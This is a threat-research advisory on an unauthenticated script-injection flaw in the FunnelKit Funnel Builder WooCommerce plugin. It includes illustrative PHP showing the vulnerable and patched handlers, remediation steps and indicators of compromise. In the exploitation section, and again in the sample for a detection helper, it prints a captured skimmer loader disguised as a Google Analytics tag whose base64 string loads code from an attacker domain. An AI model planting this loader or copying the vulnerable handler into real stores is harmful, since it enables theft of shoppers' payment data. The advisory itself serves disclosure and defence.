Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts

by Sansec Forensics Team

Published in Threat Research − May 14, 2026

A critical vulnerability in Funnel Builder by FunnelKit threatens more than 40,000 WooCommerce checkouts. Sansec is observing active exploitation, with attackers injecting fake Google Tag Manager scripts to steal customer payment data.

Sansec is tracking active attacks against Funnel Builder by FunnelKit, a checkout and upsell plugin used on 40,000+ WooCommerce stores. All versions before 3.15.0.3 let unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store.

Attackers are planting fake Google Tag Manager scripts into the plugin's "External Scripts" setting. The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.

FunnelKit has shipped a patched version and is asking all customers to update.

The vulnerability

Funnel Builder exposes a public, unauthenticated checkout endpoint whose request parameters name the internal method it should run. Releases before 3.15.0.3 neither check the caller's capabilities nor restrict which methods may be invoked through it.

An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin's global settings. Whatever sits in the "External Scripts" setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.

The patch adds the missing capability check and locks the endpoint down to an allow-list of safe methods. Patch details are in the changeset on WordPress.org.
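The following is an added illustration of the bug class described above and of the two fixes the patch applies. It is not FunnelKit's code: the hook name, class, option name and method names are invented for the example, and only the shape of the flaw (request-chosen dispatch on a public WordPress AJAX endpoint, with no capability check and no allow-list) mirrors the advisory.

```php
<?php
// Illustrative only, NOT FunnelKit's code. Every identifier here is made up.
// It shows why "let the request pick the method" is dangerous on an endpoint
// that anonymous shoppers can reach, and what the patched shape looks like.

class Example_Checkout_Ajax {

    // Option that holds the checkout settings, including the scripts that get
    // echoed onto every checkout page. Name is an assumption for the example.
    const OPTION = 'example_checkout_settings';

    // ---- Vulnerable shape -------------------------------------------------
    // Registered for both logged-in and anonymous callers, as a checkout
    // endpoint must be, so anybody on the internet can hit the handler.
    public function register_vulnerable() {
        add_action( 'wp_ajax_example_checkout', array( $this, 'handle_vulnerable' ) );
        add_action( 'wp_ajax_nopriv_example_checkout', array( $this, 'handle_vulnerable' ) );
    }

    public function handle_vulnerable() {
        // The request names the method. No nonce, no capability check and no
        // allow-list, so "save_settings" is as reachable as "get_totals".
        $method = isset( $_POST['method'] ) ? sanitize_text_field( wp_unslash( $_POST['method'] ) ) : '';
        if ( $method && method_exists( $this, $method ) ) {
            wp_send_json( $this->$method( $_POST ) );
        }
        wp_send_json_error( 'unknown method', 400 );
    }

    // ---- Hardened shape ---------------------------------------------------
    // Read-only checkout helpers stay public; anything that writes is gated
    // behind a nonce and a capability check, and unknown names are rejected
    // even if a method of that name exists.
    const PUBLIC_METHODS = array( 'get_totals' );
    const ADMIN_METHODS  = array( 'save_settings' );

    public function handle_hardened() {
        $method = isset( $_POST['method'] ) ? sanitize_text_field( wp_unslash( $_POST['method'] ) ) : '';

        if ( in_array( $method, self::PUBLIC_METHODS, true ) ) {
            wp_send_json( $this->$method( $_POST ) );
        }

        if ( in_array( $method, self::ADMIN_METHODS, true ) ) {
            // CSRF protection, then an explicit capability check, before any write.
            check_ajax_referer( 'example_checkout_admin', 'nonce' );
            if ( ! current_user_can( 'manage_options' ) ) {
                wp_send_json_error( 'forbidden', 403 );
            }
            wp_send_json( $this->$method( $_POST ) );
        }

        wp_send_json_error( 'unknown method', 400 );
    }

    // Harmless read-only helper; fine to expose to anonymous shoppers.
    private function get_totals( $req ) {
        return array( 'total' => (float) WC()->cart->get_total( 'edit' ) );
    }

    // The dangerous sink: request data lands in a global option that the
    // checkout template later prints as a <script> on every checkout page.
    private function save_settings( $req ) {
        $settings = get_option( self::OPTION, array() );
        $settings['external_scripts'] = isset( $req['external_scripts'] ) ? (string) $req['external_scripts'] : '';
        update_option( self::OPTION, $settings );
        return array( 'saved' => true );
    }
}
```

The point of the hardened version is that the allow-list is the primary control: a capability check alone would still let a logged-in customer reach a write method if the list were missing, and an allow-list alone would still let anonymous callers reach `save_settings` if it were on the public list. Both are needed, and the default for anything not on a list is rejection.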

Observed exploitation

In at least one case, Sansec found a payload posing as a Google Tag Manager loader, sitting next to the store's legitimate marketing tags:

// Shaped like the standard Google Analytics snippet. The fourth argument (g),
// the visible google-analytics.com URL, is never used; only r is.
(function (i, s, o, g, r) {
  window.addEventListener("load", function () {
    a = s.createElement(o);
    a.async = 1;
    a.src = atob(r);        // the real loader URL is base64-encoded in r
    s.body.appendChild(a);
  });
})(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");

The google-analytics.com URL in the fourth argument is never used; it is there for anyone skimming the tag. On page load, the script decodes the base64 string at the end and loads it as an external script: https://analytics-reports[.]com/wss/jquery-lib.js.

That loader opens a WebSocket to the attacker's C2 at wss://protect-wss[.]com/ws, which streams back a skimmer tailored to the victim store. The skimmer steals credit card numbers, CVVs, billing addresses and other personal details at checkout.

Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag.
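To make the review step concrete, here is an added triage helper for this disguise. It is not Sansec's eComscan or FunnelKit code: given a block of JavaScript (the contents of a checkout "External Scripts" setting, or a saved checkout page), it finds quoted base64 literals that decode to a URL, the trick the captured loader uses with atob, and reports where each one really points. The Google host list and the base64 heuristic are assumptions of the example, and the sample input is constructed from a generic GTM container snippet plus the loader shown above.

```php
<?php
// Added triage helper, not part of eComscan or of FunnelKit. It flags the
// pattern from the captured payload: a Google-looking snippet whose loader URL
// is hidden in a base64 literal. The host lists are example assumptions.

// Hosts from the IoC list in this article.
const KNOWN_BAD_HOSTS = array( 'analytics-reports.com', 'protect-wss.com' );

// Where genuine Google Analytics / Tag Manager snippets actually load from.
const GOOGLE_HOSTS = array( 'www.googletagmanager.com', 'www.google-analytics.com' );

function find_hidden_loaders( string $js ): array {
    $findings        = array();
    $mentions_google = (bool) preg_match( '/google-analytics\.com|googletagmanager\.com/i', $js );

    // Quoted strings made only of base64 characters. Real Google snippets carry
    // their URLs in clear text, so an encoded one is already out of place.
    preg_match_all( '/(["\'])([A-Za-z0-9+\/]{16,}={0,2})\1/', $js, $m );

    foreach ( array_unique( $m[2] ) as $literal ) {
        $decoded = base64_decode( $literal, true );
        if ( $decoded === false ) {
            continue;
        }
        $scheme = parse_url( $decoded, PHP_URL_SCHEME );
        $host   = parse_url( $decoded, PHP_URL_HOST );
        if ( ! in_array( $scheme, array( 'http', 'https', 'ws', 'wss' ), true ) || ! $host ) {
            continue; // decoded to something other than a script or socket URL
        }
        $host = strtolower( $host );
        $findings[] = array(
            'encoded'   => $literal,
            'url'       => $decoded,
            'host'      => $host,
            // Google-looking snippet, hidden URL that is not Google: the disguise above.
            'decoy'     => $mentions_google && ! in_array( $host, GOOGLE_HOSTS, true ),
            'known_bad' => in_array( $host, KNOWN_BAD_HOSTS, true ),
        );
    }
    return $findings;
}

// Constructed sample: a legitimate-looking GTM container snippet followed by the
// loader captured in this article. Only the second should be reported.
$sample = <<<'JS'
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>
<script>(function (i, s, o, g, r) {
  window.addEventListener("load", function () {
    a = s.createElement(o); a.async = 1; a.src = atob(r); s.body.appendChild(a);
  });
})(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");</script>
JS;

foreach ( find_hidden_loaders( $sample ) as $f ) {
    printf( "%s... -> %s  decoy=%s known_bad=%s\n",
        substr( $f['encoded'], 0, 12 ), $f['url'],
        $f['decoy'] ? 'yes' : 'no', $f['known_bad'] ? 'yes' : 'no' );
}
```

Run it against the saved HTML of a checkout page or the pasted value of the External Scripts field. The GTM snippet produces no finding because every long quoted string in it contains characters outside the base64 alphabet; the captured loader produces one finding pointing at analytics-reports.com, marked both as a decoy and as a known IoC. Treat any hit as a reason to inspect the script, not as proof on its own: a legitimate tag could in principle carry an encoded URL, but the pair "mentions Google, loads from somewhere else" is exactly what this campaign relies on reviewers missing.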

What to do

FunnelKit's own advisory to customers reads:

We've just released an important security update for Funnel Builder 3.15.0.3 that needs to be updated on your site. We identified an issue that allowed bad actors to inject scripts.

As a precaution, we'd recommend two quick steps:

  1. Update FunnelKit plugins to the latest version from your WordPress dashboard.
  2. Take a moment to review your Settings > Checkout > External Scripts (or other script settings) & remove any script that looks unfamiliar.

On top of FunnelKit's advice, run eComscan. It detects this skimmer along with other malware, backdoors and vulnerabilities that may already be on your store.

Indicators of Compromise

analytics-reports[.]com/wss/jquery-lib.js
wss://protect-wss[.]com/ws
